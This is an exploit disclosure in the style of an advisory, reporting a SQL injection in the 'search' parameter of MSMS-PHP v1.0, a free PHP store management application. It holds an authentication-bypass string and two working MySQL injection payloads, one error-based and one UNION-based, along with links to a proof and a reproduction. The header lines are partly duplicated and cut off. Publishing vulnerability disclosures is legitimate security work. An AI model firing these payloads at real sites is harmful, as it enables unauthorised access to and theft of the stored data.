## Author: nu11secur1ty
## Date: 03/13/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.c ## Title: MSMS-PHP (by: oretnom23 ) v1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 03/13/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
This issue was generated by the BCheck: puncher_SQLi_bypass_authentication.
There is a change in response when nu11secur1ty' or 1=1# is injected.
Potential SQLi detected. Please confirm it manually after you check
the POST, GET, or other requests... The payload from the
puncher_SQLi_bypass_authentication module was submitted successfully
after the test. The `search` parameter is vulnerable for Multiple SQLi
attacks. The attacker can get all information from the system by using
this vulnerability!
STATUS: HIGH- Vulnerability
[+]Payload:
```mysql
---
Parameter: search (GET)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: p=products&search=-9068') OR 1 GROUP BY
CONCAT(0x716b717671,(SELECT (CASE WHEN (4449=4449) THEN 1 ELSE 0
END)),0x71706b7a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: UNION query
Title: MySQL UNION query (random number) - 9 columns
Payload: p=products&search=-7515') UNION ALL SELECT
2313,2313,2313,2313,CONCAT(0x716b717671,0x6e73537a656d74516c6d6751704b58725771474449755548546a50537054586f6656546a78447941,0x71706b7a71),2313,2313,2313,2313#
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-multiple-sqli.html)
## Time spend:
00:15:00